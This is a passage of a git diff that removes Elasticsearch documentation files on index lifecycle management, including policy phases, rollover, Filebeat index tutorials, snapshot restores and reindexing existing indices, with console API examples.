- } - }, - "version" : 1, - "modified_date_in_millis" : 1541717264230 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:no way to know if we will get this response immediately] - -<1> The policy being used to manage the index: `shrink-index` -<2> The index age: 5.1 days -<3> The phase the index is currently in: `warm` -<4> The current action: `shrink` -<5> The step the index is currently in: `ERROR` -<6> The step that failed to execute: `shrink` -<7> The type of error and a description of that error. -<8> The definition of the current phase from the `shrink-index` policy - -To resolve this, you could update the policy to shrink the index to a single shard after 5 days: - -[source,console] --------------------------------------------------- -PUT _ilm/policy/shrink-index -{ - "policy": { - "phases": { - "warm": { - "min_age": "5d", - "actions": { - "shrink": { - "number_of_shards": 1 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -=== Retrying failed lifecycle policy steps - -Once you fix the problem that put an index in the `ERROR` step, -you might need to explicitly tell {ilm-init} to retry the step: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_ilm/retry --------------------------------------------------- -// TEST[skip:we can't be sure the index is ready to be retried at this point] - -{ilm-init} subsequently attempts to re-run the step that failed. -You can use the <> to monitor the progress. diff --git a/docs/reference/ilm/example-index-lifecycle-policy.asciidoc b/docs/reference/ilm/example-index-lifecycle-policy.asciidoc deleted file mode 100644 index 9b819e64e1f..00000000000 --- a/docs/reference/ilm/example-index-lifecycle-policy.asciidoc +++ /dev/null @@ -1,165 +0,0 @@ -[role="xpack"] - -[[example-using-index-lifecycle-policy]] -=== Tutorial: Manage {filebeat} time-based indices -++++ -Manage {filebeat} time-based indices -++++ - -With {ilm} ({ilm-init}), you can create policies that perform actions automatically -on indices as they age and grow. {ilm-init} policies help you to manage -performance, resilience, and retention of your data during its lifecycle. This tutorial shows -you how to use {kib}’s *Index Lifecycle Policies* to modify and create {ilm-init} -policies. You can learn more about all of the actions, benefits, and lifecycle -phases in the <>. - - -[discrete] -[[example-using-index-lifecycle-policy-scenario]] -==== Scenario - -You’re tasked with sending syslog files to an {es} cluster. This -log data has the following data retention guidelines: - -* Keep logs on hot data nodes for 30 days -* Roll over to a new index if the size reaches 50GB -* After 30 days: -** Move the logs to warm data nodes -** Set <> to 1 -** <> multiple index segments to free up the space used by deleted documents -* Delete logs after 90 days - - -[discrete] -[[example-using-index-lifecycle-policy-prerequisites]] -==== Prerequisites - -To complete this tutorial, you'll need: - -* An {es} cluster with hot and warm nodes configured for shard allocation -awareness. - -** {ess}: -Choose the Elastic Stack and then the {cloud}/ec-getting-started-profiles.html#ec-getting-started-profiles-hot-warm[hot-warm architecture] hardware profile. - -** Self-managed cluster: -Add node attributes as described for {ref}/shard-allocation-filtering.html[shard allocation filtering]. -+ -For example, you can set this in your `elasticsearch.yml` for each data node: -+ -[source,yaml] --------------------------------------------------------------------------------- -node.attr.data: "warm" --------------------------------------------------------------------------------- - -* A server with {filebeat} installed and configured to send logs to the `elasticsearch` -output as described in the {filebeat-ref}/filebeat-installation-configuration.html[{filebeat} quick start]. - -[discrete] -[[example-using-index-lifecycle-policy-view-fb-ilm-policy]] -==== View the {filebeat} {ilm-init} policy - -{filebeat} includes a default {ilm-init} policy that enables rollover. {ilm-init} -is enabled automatically if you’re using the default `filebeat.yml` and index template. - -To view the default policy in {kib}: - -. Go to Management and select *Index Lifecycle Policies*. -. Search for _filebeat_ -. Select the _filebeat-version_ policy. - -This policy initiates the rollover action when the index size reaches 50GB or -becomes 30 days old. - -[role="screenshot"] -image::images/ilm/tutorial-ilm-hotphaserollover-default.png["Default policy"] - - -[discrete] -==== Modify the policy - -The default policy is enough to prevent the creation of many tiny daily indices. -You can modify the policy to meet more complex requirements. - -. Activate the warm phase. -+ --- -[role="screenshot"] -image::images/ilm/tutorial-ilm-modify-default-warm-phase-rollover.png["Modify to add warm phase"] - -.. Set one of the following options to control when the index moves to the warm phase: - -*** Provide a value for *Timing for warm phase*. Setting this to *15* keeps the -indices on hot nodes for a range of 15-45 days, depending on when the initial -rollover occurred. - -*** Enable *Move to warm phase on rollover*. The index might move to the warm phase -more quickly than intended if it reaches the *Maximum index size* before the -the *Maximum age*. - -.. In the *Select a node attribute to control shard allocation* dropdown, select -*data:warm(2)* to migrate shards to warm data nodes. - -.. Change *Number of replicas* to *1*. - -.. Enable *Force merge data* and set *Number of segments* to *1*. - -NOTE: When rollover is enabled in the hot phase, action timing in the other phases -is based on the rollover date. --- - -. Activate the delete phase and set *Timing for delete phase* to *90* days. -+ -[role="screenshot"] -image::images/ilm/tutorial-ilm-delete-rollover.png["Add a delete phase"] - -[discrete] -==== Create a custom policy - -If meeting a specific retention time period is most important, you can create a -custom policy. For this option, you use {filebeat} daily indices without -rollover. - -To create a custom policy: - -. Go to Management and select *Index Lifecycle Policies*. -. Click *Create policy*. -. Activate the warm phase and configure it as follows: -+ --- -**Timing for warm phase**: 30 days from index creation - -**Node attribute**: `data:warm` - -**Number of replicas**: 1 - -**Force merge data**: enable - -**Number of segments**: 1 - -[role="screenshot"] -image::images/ilm/tutorial-ilm-custom-policy.png["Modify the custom policy to add a warm phase"] --- - -. Activate the delete phase and set the timing to 90 days. -+ -[role="screenshot"] -image::images/ilm/tutorial-ilm-delete-phase-creation.png["Delete phase"] - -To configure the index to use the new policy: - -. Go to Management and select *Index Lifecycle Policies*. -. Find your {ilm-init} policy and click its *Actions* link. -. Choose *Add policy to index template*. -. Select your {filebeat} index template name from the *Index template* list. For example, `filebeat-7.5.x`. -. Click *Add Policy* to save the changes. -+ -NOTE: If you initially used the default {filebeat} {ilm-init} policy, you will -see a notice that the template already has a policy associated with it. Confirm -that you want to overwrite that configuration. - -When you change the policy associated with the index template, the active -index will continue to use the policy it was associated with at index creation -unless you manually update it. The next new index will use the updated policy. -For more reasons that your {ilm-init} policy changes might be delayed, see -<>. diff --git a/docs/reference/ilm/ilm-actions.asciidoc b/docs/reference/ilm/ilm-actions.asciidoc deleted file mode 100644 index 4d04e38a400..00000000000 --- a/docs/reference/ilm/ilm-actions.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-actions]] -== Index lifecycle actions - -<>:: -Move shards to nodes with different performance characteristics -and reduce the number of replicas. - -<>:: -Permanently remove the index. - -<>:: -Reduce the number of index segments and purge deleted documents. -Makes the index read-only. - -<>:: -Freeze the index to minimize its memory footprint. - -<>:: -Move the index shards to the <> that corresponds -to the current {ilm-init} phase. - -<>:: -Block write operations to the index. - -<>:: -Remove the index as the write index for the rollover alias and -start indexing to a new index. - -<>:: -beta:[] -Take a snapshot of the managed index in the configured repository -and mount it as a searchable snapshot. - -<>:: -Lower the priority of an index as it moves through the lifecycle -to ensure that hot indices are recovered first. - -<>:: -Reduce the number of primary shards by shrinking the index into a new index. - -<>:: -Convert a follower index to a regular index. -Performed automatically before a rollover, shrink, or searchable snapshot action. - -<>:: -Ensure that a snapshot exists before deleting the index. - -include::actions/ilm-allocate.asciidoc[] -include::actions/ilm-delete.asciidoc[] -include::actions/ilm-forcemerge.asciidoc[] -include::actions/ilm-freeze.asciidoc[] -include::actions/ilm-migrate.asciidoc[] -include::actions/ilm-readonly.asciidoc[] -include::actions/ilm-rollover.asciidoc[] -include::actions/ilm-searchable-snapshot.asciidoc[] -include::actions/ilm-set-priority.asciidoc[] -include::actions/ilm-shrink.asciidoc[] -include::actions/ilm-unfollow.asciidoc[] -include::actions/ilm-wait-for-snapshot.asciidoc[] diff --git a/docs/reference/ilm/ilm-and-snapshots.asciidoc b/docs/reference/ilm/ilm-and-snapshots.asciidoc deleted file mode 100644 index 8682391df99..00000000000 --- a/docs/reference/ilm/ilm-and-snapshots.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[index-lifecycle-and-snapshots]] -== Restore a managed data stream or index - -When you restore a managed index or a data stream with managed backing indices, -{ilm-init} automatically resumes executing the restored indices' policies. -A restored index's `min_age` is relative to when it was originally created or rolled over, -not its restoration time. -Policy actions are performed on the same schedule whether or not -an index has been restored from a snapshot. -If you restore an index that was accidentally deleted half way through its month long lifecycle, -it proceeds normally through the last two weeks of its lifecycle. - -In some cases, you might want to prevent {ilm-init} from immediately executing -its policy on a restored index. -For example, if you are restoring an older snapshot you might want to -prevent it from rapidly progressing through all of its lifecycle phases. -You might want to add or update documents before it's marked read-only or shrunk, -or prevent the index from being immediately deleted. - -To prevent {ilm-init} from executing a restored index's policy: - -1. Temporarily <>. This pauses execution of _all_ {ilm-init} policies. -2. Restore the snapshot. -3. <> from the index or perform whatever actions you need to - before {ilm-init} resumes policy execution. -4. <> to resume policy execution. diff --git a/docs/reference/ilm/ilm-concepts.asciidoc b/docs/reference/ilm/ilm-concepts.asciidoc deleted file mode 100644 index 5ff31b5b34b..00000000000 --- a/docs/reference/ilm/ilm-concepts.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-concepts]] -== {ilm-init} concepts - -++++ -Concepts -++++ - -* <> -* <> -* <> - -include::ilm-index-lifecycle.asciidoc[] -include::index-rollover.asciidoc[] -include::update-lifecycle-policy.asciidoc[] \ No newline at end of file diff --git a/docs/reference/ilm/ilm-index-lifecycle.asciidoc b/docs/reference/ilm/ilm-index-lifecycle.asciidoc deleted file mode 100644 index 30b6aaf7862..00000000000 --- a/docs/reference/ilm/ilm-index-lifecycle.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-index-lifecycle]] -=== Index lifecycle -++++ -Index lifecycle -++++ - -{ilm-init} defines four index lifecycle _phases_: - -* **Hot**: The index is actively being updated and queried. -* **Warm**: The index is no longer being updated but is still being queried. -* **Cold**: The index is no longer being updated and is seldom queried. The -information still needs to be searchable, but it's okay if those queries are -slower. -* **Delete**: The index is no longer needed and can safely be removed. - -An index's _lifecycle policy_ specifies which phases -are applicable, what actions are performed in each phase, -and when it transitions between phases. - -You can manually apply a lifecycle policy when you create an index. -For time series indices, you need to associate the lifecycle policy with -the index template used to create new indices in the series. -When an index rolls over, a manually-applied policy isn't automatically applied to the new index. - -If you use {es}'s security features, {ilm-init} performs operations as the user -who last updated the policy. {ilm-init} only has the -<> assigned to the user at the time of the last policy -update. - -[discrete] -[[ilm-phase-transitions]] -=== Phase transitions - -{ilm-init} moves indices through the lifecycle according to their age. -To control the timing of these transitions, you set a _minimum age_ for each phase. -For an index to move to the next phase, all actions in the current phase must be complete and -the index must be older than the minimum age of the next phase. - -The minimum age defaults to zero, which causes {ilm-init} to move indices to the next phase -as soon as all actions in the current phase complete. - -If an index has unallocated shards and the <> is yellow, -the index can still transition to the next phase according to its {ilm} policy. -However, because {es} can only perform certain clean up tasks on a green -cluster, there might be unexpected side effects. - -To avoid increased disk usage and reliability issues, -address any cluster health problems in a timely fashion. - - -[discrete] -[[ilm-phase-execution]] -=== Phase execution - -{ilm-init} controls the order in which the actions in a phase are executed and -what _steps_ are executed to perform the necessary index operations for each action. - -When an index enters a phase, {ilm-init} caches the phase definition in the index metadata. -This ensures that policy updates don't put the index into a state where it can never exit the phase. -If changes can be safely applied, {ilm-init} updates the cached phase definition. -If they cannot, phase execution continues using the cached definition. - -{ilm-init} runs periodically, checks to see if an index meets policy criteria, -and executes whatever steps are needed. -To avoid race conditions, {ilm-init} might need to run more than once to execute all of the steps -required to complete an action. -For example, if {ilm-init} determines that an index has met the rollover criteria, -it begins executing the steps required to complete the rollover action. -If it reaches a point where it is not safe to advance to the next step, execution stops. -The next time {ilm-init} runs, {ilm-init} picks up execution where it left off. -This means that even if `indices.lifecycle.poll_interval` is set to 10 minutes and an index meets -the rollover criteria, it could be 20 minutes before the rollover is complete. - -[discrete] -[[ilm-phase-actions]] -=== Phase actions - -{ilm-init} supports the following actions in each phase. - -* Hot - - <> - - <> - - <> - - <> -* Warm - - <> - - <> - - <> - - <> - - <> - - <> -* Cold - - <> - - <> - - <> - - <> - - <> -* Delete - - <> - - <> - diff --git a/docs/reference/ilm/ilm-overview.asciidoc b/docs/reference/ilm/ilm-overview.asciidoc deleted file mode 100644 index c67db1a90bf..00000000000 --- a/docs/reference/ilm/ilm-overview.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[overview-index-lifecycle-management]] -== {ilm-init} overview - -++++ -Overview -++++ - -You can create and apply {ilm-cap} ({ilm-init}) policies to automatically manage your indices -according to your performance, resiliency, and retention requirements. - -Index lifecycle policies can trigger actions such as: - -* **Rollover**: -include::../glossary.asciidoc[tag=rollover-def-short] -* **Shrink**: -include::../glossary.asciidoc[tag=shrink-def-short] -* **Force merge**: -include::../glossary.asciidoc[tag=force-merge-def-short] -* **Freeze**: -include::../glossary.asciidoc[tag=freeze-def-short] -* **Delete**: Permanently remove an index, including all of its data and metadata. - -{ilm-init} makes it easier to manage indices in hot-warm-cold architectures, -which are common when you're working with time series data such as logs and metrics. - -You can specify: - -* The maximum shard size, number of documents, or age at which you want to roll over to a new index. -* The point at which the index is no longer being updated and the number of -primary shards can be reduced. -* When to force a merge to permanently remove documents marked for deletion. -* The point at which the index can be moved to less performant hardware. -* The point at which the availability is not as critical and the number of -replicas can be reduced. -* When the index can be safely deleted. - -For example, if you are indexing metrics data from a fleet of ATMs into -Elasticsearch, you might define a policy that says: - -. When the total size of the index's primary shards reaches 50GB, roll over to a new -index. -. Move the old index into the warm phase, mark it read only, and shrink it down -to a single shard. -. After 7 days, move the index into the cold phase and move it to less expensive -hardware. -. Delete the index once the required 30 day retention period is reached. - -[IMPORTANT] -=========================== -To use {ilm-init}, all nodes in a cluster must run the same version. -Although it might be possible to create and apply policies in a mixed-version cluster, -there is no guarantee they will work as intended. -Attempting to use a policy that contains actions that aren't -supported on all nodes in a cluster will cause errors. -=========================== diff --git a/docs/reference/ilm/ilm-skip-rollover.asciidoc b/docs/reference/ilm/ilm-skip-rollover.asciidoc deleted file mode 100644 index feaea73fec8..00000000000 --- a/docs/reference/ilm/ilm-skip-rollover.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[skipping-rollover]] -== Skip rollover - -When `index.lifecycle.indexing_complete` is set to `true`, -{ilm-init} won't perform the rollover action on an index, -even if it otherwise meets the rollover criteria. -It's set automatically by {ilm-init} when the rollover action completes successfully. - -You can set it manually to skip rollover if you need to make an exception -to your normal lifecycle policy and update the alias to force a roll over, -but want {ilm-init} to continue to manage the index. -If you use the rollover API. It is not necessary to configure this setting manually. - -If an index's lifecycle policy is removed, this setting is also removed. - -IMPORTANT: When `index.lifecycle.indexing_complete` is `true`, -{ilm-init} verifies that the index is no longer the write index -for the alias specified by `index.lifecycle.rollover_alias`. -If the index is still the write index or the rollover alias is not set, -the index is moved to the <>. - -For example, if you need to change the name of new indices in a series while retaining -previously-indexed data in accordance with your configured policy, you can: - -. Create a template for the new index pattern that uses the same policy. -. Bootstrap the initial index. -. Change the write index for the alias to the bootstrapped index -using the <> API. -. Set `index.lifecycle.indexing_complete` to `true` on the old index to indicate -that it does not need to be rolled over. - -{ilm-init} continues to manage the old index in accordance with your existing policy. -New indices are named according to the new template and -managed according to the same policy without interruption. diff --git a/docs/reference/ilm/ilm-tutorial.asciidoc b/docs/reference/ilm/ilm-tutorial.asciidoc deleted file mode 100644 index 3b290ac8d70..00000000000 --- a/docs/reference/ilm/ilm-tutorial.asciidoc +++ /dev/null @@ -1,410 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[getting-started-index-lifecycle-management]] -== Tutorial: Automate rollover with {ilm-init} - -++++ -Automate rollover -++++ - -When you continuously index timestamped documents into {es}, -you typically use a <> so you can periodically roll over to a -new index. -This enables you to implement a hot-warm-cold architecture to meet your performance -requirements for your newest data, control costs over time, enforce retention policies, -and still get the most out of your data. - -TIP: Data streams are best suited for -<> use cases. If you need to frequently -update or delete existing documents across multiple indices, we recommend -using an index alias and index template instead. You can still use ILM to -manage and rollover the alias's indices. Skip to -<>. - -To automate rollover and management of a data stream with {ilm-init}, you: - -. <> that defines the appropriate -phases and actions. -. <> to create the data stream and -apply the ILM policy and the indices settings and mappings configurations for the backing -indices. -. <> -as expected. - -For an introduction to rolling indices, see <>. - -IMPORTANT: When you enable {ilm} for {beats} or the {ls} {es} output plugin, -lifecycle policies are set up automatically. -You do not need to take any other actions. -You can modify the default policies through -<> -or the {ilm-init} APIs. - -[discrete] -[[ilm-gs-create-policy]] -=== Create a lifecycle policy - -A lifecycle policy specifies the phases in the index lifecycle -and the actions to perform in each phase. A lifecycle can have up to four phases: -`hot`, `warm`, `cold`, and `delete`. - -For example, you might define a `timeseries_policy` that has two phases: - -* A `hot` phase that defines a rollover action to specify that an index rolls over when it -reaches either a `max_size` of 50 gigabytes or a `max_age` of 30 days. -* A `delete` phase that sets `min_age` to remove the index 90 days after rollover. -Note that this value is relative to the rollover time, not the index creation time. - -You can create the policy through {kib} or with the -<> API. -To create the policy from {kib}, open the menu and go to *Stack Management > -Index Lifecycle Policies*. Click *Index Lifecycle Policies*. - -[role="screenshot"] -image:images/ilm/create-policy.png[] - -.API example -[%collapsible] -==== -[source,console] ------------------------- -PUT _ilm/policy/timeseries_policy -{ - "policy": { - "phases": { - "hot": { <1> - "actions": { - "rollover": { - "max_size": "50GB", <2> - "max_age": "30d" - } - } - }, - "delete": { - "min_age": "90d", <3> - "actions": { - "delete": {} <4> - } - } - } - } -} ------------------------- -<1> The `min_age` defaults to `0ms`, so new indices enter the `hot` phase immediately. -<2> Trigger the `rollover` action when either of the conditions are met. -<3> Move the index into the `delete` phase 90 days after rollover. -<4> Trigger the `delete` action when the index enters the delete phase. -==== - -[discrete] -[[ilm-gs-apply-policy]] -=== Create an index template to create the data stream and apply the lifecycle policy - -To set up a data stream, first create an index template to specify the lifecycle policy. Because -the template is for a data stream, it must also include a `data_stream` definition. - -For example, you might create a `timeseries_template` to use for a future data stream -named `timeseries`. - -To enable the {ilm-init} to manage the data stream, the template configures one {ilm-init} setting: - -* `index.lifecycle.name` specifies the name of the lifecycle policy to apply to the data stream. - -You can use the {kib} Create template wizard to add the template. From Kibana, -open the menu and go to *Stack Management > Index Management*. In the *Index -Templates* tab, click *Create template*. - -image::images/data-streams/create-index-template.png[Create template page] - -This wizard invokes the <> to create -the index template with the options you specify. - -.API example -[%collapsible] -==== -[source,console] ------------------------ -PUT _index_template/timeseries_template -{ - "index_patterns": ["timeseries"], <1> - "data_stream": { }, - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "timeseries_policy" <2> - } - } -} ------------------------ -// TEST[continued] - -<1> Apply the template when a document is indexed into the `timeseries` target. -<2> The name of the {ilm-init} policy used to manage the data stream. -==== - -[discrete] -[[ilm-gs-create-the-data-stream]] -=== Create the data stream - -To get things started, index a document into the name or wildcard pattern defined -in the `index_patterns` of the <>. As long -as an existing data stream, index, or index alias does not already use the name, the index -request automatically creates a corresponding data stream with a single backing index. -{es} automatically indexes the request's documents into this backing index, which also -acts as the stream's <>. - -For example, the following request creates the `timeseries` data stream and the first generation -backing index called `.ds-timeseries-000001`. - -[source,console] ------------------------ -POST timeseries/_doc -{ - "message": "logged the request", - "@timestamp": "1591890611" -} - ------------------------ -// TEST[continued] - -When a rollover condition in the lifecycle policy is met, the `rollover` action: - -* Creates the second generation backing index, named `.ds-timeseries-000002`. -Because it is a backing index of the `timeseries` data stream, the configuration from the `timeseries_template` index template is applied to the new index. -* As it is the latest generation index of the `timeseries` data stream, the newly created -backing index `.ds-timeseries-000002` becomes the data stream's write index. - -This process repeats each time a rollover condition is met. -You can search across all of the data stream's backing indices, managed by the `timeseries_policy`, -with the `timeseries` data stream name. -Write operations are routed to the current write index. Read operations will be handled by all -backing indices. - -[discrete] -[[ilm-gs-check-progress]] -=== Check lifecycle progress - -To get status information for managed indices, you use the {ilm-init} explain API. -This lets you find out things like: - -* What phase an index is in and when it entered that phase. -* The current action and what step is being performed. -* If any errors have occurred or progress is blocked. - -For example, the following request gets information about the `timeseries` data stream's -backing indices: - -[source,console] --------------------------------------------------- -GET .ds-timeseries-*/_ilm/explain --------------------------------------------------- -// TEST[continued] - -The following response shows the data stream's first generation backing index is waiting for the `hot` -phase's `rollover` action. -It remains in this state and {ilm-init} continues to call `check-rollover-ready` until a rollover condition -is met. - -// [[36818c6d9f434d387819c30bd9addb14]] -[source,console-result] --------------------------------------------------- -{ - "indices": { - ".ds-timeseries-000001": { - "index": ".ds-timeseries-000001", - "managed": true, - "policy": "timeseries_policy", <1> - "lifecycle_date_millis": 1538475653281, - "age": "30s", <2> - "phase": "hot", - "phase_time_millis": 1538475653317, - "action": "rollover", - "action_time_millis": 1538475653317, - "step": "check-rollover-ready", <3> - "step_time_millis": 1538475653317, - "phase_execution": { - "policy": "timeseries_policy", - "phase_definition": { <4> - "min_age": "0ms", - "actions": { - "rollover": { - "max_size": "50gb", - "max_age": "30d" - } - } - }, - "version": 1, - "modified_date_in_millis": 1539609701576 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:no way to know if we will get this response immediately] - -<1> The policy used to manage the index -<2> The age of the index -<3> The step {ilm-init} is performing on the index -<4> The definition of the current phase (the `hot` phase) - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_data_stream/timeseries --------------------------------------------------- -// TEST[continued] - -////////////////////////// - - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_index_template/timeseries_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[discrete] -[[manage-time-series-data-without-data-streams]] -=== Manage time series data without data streams - -Even though <> are a convenient way to scale -and manage time series data, they are designed to be append-only. We recognise there -might be use-cases where data needs to be updated or deleted in place and the -data streams don't support delete and update requests directly, -so the index APIs would need to be used directly on the data stream's backing indices. - -In these cases, you can use an index alias to manage indices containing the time series data -and periodically roll over to a new index. - -To automate rollover and management of time series indices with {ilm-init} using an index -alias, you: - -. Create a lifecycle policy that defines the appropriate phases and actions. -See <> above. -. <> to apply the policy to each new index. -. <> as the initial write index. -. <> -as expected. - -[discrete] -[[ilm-gs-alias-apply-policy]] -=== Create an index template to apply the lifecycle policy - -To automatically apply a lifecycle policy to the new write index on rollover, -specify the policy in the index template used to create new indices. - -For example, you might create a `timeseries_template` that is applied to new indices -whose names match the `timeseries-*` index pattern. - -To enable automatic rollover, the template configures two {ilm-init} settings: - -* `index.lifecycle.name` specifies the name of the lifecycle policy to apply to new indices -that match the index pattern. -* `index.lifecycle.rollover_alias` specifies the index alias to be rolled over -when the rollover action is triggered for an index. - -You can use the {kib} Create template wizard to add the template. To access the -wizard, open the menu and go to *Stack Management > Index Management*. In the -the *Index Templates* tab, click *Create template*. - -[role="screenshot"] -image:images/ilm/create-template-wizard.png[Create template page] - -The create template request for the example template looks like this: - -[source,console] ------------------------ -PUT _index_template/timeseries_template -{ - "index_patterns": ["timeseries-*"], <1> - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index.lifecycle.name": "timeseries_policy", <2> - "index.lifecycle.rollover_alias": "timeseries" <3> - } - } -} ------------------------ -// TEST[continued] - -<1> Apply the template to a new index if its name starts with `timeseries-`. -<2> The name of the lifecycle policy to apply to each new index. -<3> The name of the alias used to reference these indices. -Required for policies that use the rollover action. - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE _index_template/timeseries_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[discrete] -[[ilm-gs-alias-bootstrap]] -=== Bootstrap the initial time series index with a write index alias - -To get things started, you need to bootstrap an initial index and -designate it as the write index for the rollover alias specified in your index template. -The name of this index must match the template's index pattern and end with a number. -On rollover, this value is incremented to generate a name for the new index. - -For example, the following request creates an index called `timeseries-000001` -and makes it the write index for the `timeseries` alias. - -[source,console] ------------------------ -PUT timeseries-000001 -{ - "aliases": { - "timeseries": { - "is_write_index": true - } - } -} ------------------------ -// TEST[continued] - -When the rollover conditions are met, the `rollover` action: - -* Creates a new index called `timeseries-000002`. -This matches the `timeseries-*` pattern, so the settings from `timeseries_template` are applied to the new index. -* Designates the new index as the write index and makes the bootstrap index read-only. - -This process repeats each time rollover conditions are met. -You can search across all of the indices managed by the `timeseries_policy` with the `timeseries` alias. -Write operations are routed to the current write index. - -[discrete] -[[ilm-gs-alias-check-progress]] -=== Check lifecycle progress - -Retrieving the status information for managed indices is very similar to the data stream case. -See the data stream <> for more information. -The only difference is the indices namespace, so retrieving the progress will entail the following -api call: - -[source,console] --------------------------------------------------- -GET timeseries-*/_ilm/explain --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /timeseries-000001 --------------------------------------------------- -// TEST[continued] -////////////////////////// diff --git a/docs/reference/ilm/ilm-with-existing-indices.asciidoc b/docs/reference/ilm/ilm-with-existing-indices.asciidoc deleted file mode 100644 index 28a9ffce71c..00000000000 --- a/docs/reference/ilm/ilm-with-existing-indices.asciidoc +++ /dev/null @@ -1,202 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[ilm-with-existing-indices]] -== Manage existing indices - -If you've been using Curator or some other mechanism to manage periodic indices, -you have a couple options when migrating to {ilm-init}: - -* Set up your index templates to use an {ilm-init} policy to manage your new indices. -Once {ilm-init} is managing your current write index, you can apply an appropriate policy to your old indices. - -* Reindex into an {ilm-init}-managed index. - -NOTE: Starting in Curator version 5.7, Curator ignores {ilm-init} managed indices. - -[discrete] -[[ilm-existing-indices-apply]] -=== Apply policies to existing time series indices - -The simplest way to transition to managing your periodic indices with {ilm-init} is -to <> to apply a lifecycle policy to new indices. -Once the index you are writing to is being managed by {ilm-init}, -you can <> to your older indices. - -Define a separate policy for your older indices that omits the rollover action. -Rollover is used to manage where new data goes, so isn't applicable. - -Keep in mind that policies applied to existing indices compare the `min_age` for each phase to -the original creation date of the index, and might proceed through multiple phases immediately. -If your policy performs resource-intensive operations like force merge, -you don't want to have a lot of indices performing those operations all at once -when you switch over to {ilm-init}. - -You can specify different `min_age` values in the policy you use for existing indices, -or set <> -to control how the index age is calculated. - -Once all pre-{ilm-init} indices have been aged out and removed, -you can delete the policy you used to manage them. - -NOTE: If you are using {beats} or {ls}, enabling {ilm-init} in version 7.0 and onward -sets up {ilm-init} to manage new indices automatically. -If you are using {beats} through {ls}, -you might need to change your {ls} output configuration and invoke the {beats} setup -to use {ilm-init} for new data. - -[discrete] -[[ilm-existing-indices-reindex]] -=== Reindex into a managed index - -An alternative to <> is to -reindex your data into an {ilm-init}-managed index. -You might want to do this if creating periodic indices with very small amounts of data -has led to excessive shard counts, or if continually indexing into the same index has led to large shards -and performance issues. - -First, you need to set up the new {ilm-init}-managed index: - -. Update your index template to include the necessary {ilm-init} settings. -. Bootstrap an initial index as the write index. -. Stop writing to the old indices and index new documents using the alias that points to bootstrapped index. - -To reindex into the managed index: - -. Pause indexing new documents if you do not want to mix new and old data in the {ilm-init}-managed index. -Mixing old and new data in one index is safe, -but a combined index needs to be retained until you are ready to delete the new data. - -. Reduce the {ilm-init} poll interval to ensure that the index doesn't -grow too large while waiting for the rollover check. -By default, {ilm-init} checks to see what actions need to be taken every 10 minutes. -+ --- -[source,console] ------------------------ -PUT _cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": "1m" <1> - } -} ------------------------ -// TEST[skip:don't want to overwrite this setting for other tests] -<1> Check once a minute to see if {ilm-init} actions such as rollover need to be performed. --- - -. Reindex your data using the <>. -If you want to partition the data in the order in which it was originally indexed, -you can run separate reindex requests. -+ --- -IMPORTANT: Documents retain their original IDs. If you don't use automatically generated document IDs, -and are reindexing from multiple source indices, you might need to do additional processing to -ensure that document IDs don't conflict. One way to do this is to use a -<> in the reindex call to append the original index name -to the document ID. - -////////////////////////// -[source,console] ------------------------ -PUT _index_template/mylogs_template -{ - "index_patterns": [ - "mylogs-*" - ], - "template": { - "settings": { - "number_of_shards": 1, - "number_of_replicas": 1, - "index": { - "lifecycle": { - "name": "mylogs_condensed_policy", <2> - "rollover_alias": "mylogs" <3> - } - } - }, - "mappings": { - "properties": { - "message": { - "type": "text" - }, - "@timestamp": { - "type": "date" - } - } - } - } -} ------------------------ - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.24/_doc -{ - "@timestamp": "2019-06-24T10:34:00", - "message": "this is one log message" -} ------------------------ -// TEST[continued] - -[source,console] ------------------------ -POST mylogs-pre-ilm-2019.06.25/_doc -{ - "@timestamp": "2019-06-25T17:42:00", - "message": "this is another log message" -} ------------------------ -// TEST[continued] - -[source,console] --------------------------------------------------- -DELETE _index_template/mylogs_template --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console] ------------------------ -POST _reindex -{ - "source": { - "index": "mylogs-*" <1> - }, - "dest": { - "index": "mylogs", <2> - "op_type": "create" <3> - } -} ------------------------ -// TEST[continued] - -<1> Matches your existing indices. Using the prefix for - the new indices makes using this index pattern much easier. -<2> The alias that points to your bootstrapped index. -<3> Halts reindexing if multiple documents have the same ID. - This is recommended to prevent accidentally overwriting documents - if documents in different source indices have the same ID. --- - -. When reindexing is complete, set the {ilm-init} poll interval back to its default value to -prevent unnecessary load on the master node: -+ -[source,console] ------------------------ -PUT _cluster/settings -{ - "transient": { - "indices.lifecycle.poll_interval": null - } -} - ------------------------ -// TEST[skip:don't want to overwrite this setting for other tests] - -. Resume indexing new data using the same alias. -+ -Querying using this alias will now search your new data and all of the reindexed data. - -. Once you have verified that all of the reindexed data is available in the new managed indices, -you can safely remove the old indices. diff --git a/docs/reference/ilm/index-rollover.asciidoc b/docs/reference/ilm/index-rollover.asciidoc deleted file mode 100644 index 42350ed13c9..00000000000 --- a/docs/reference/ilm/index-rollover.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[index-rollover]] -=== Rollover - -When indexing time series data like logs or metrics, you can't write to a single index indefinitely. -To meet your indexing and search performance requirements and manage resource usage, -you write to an 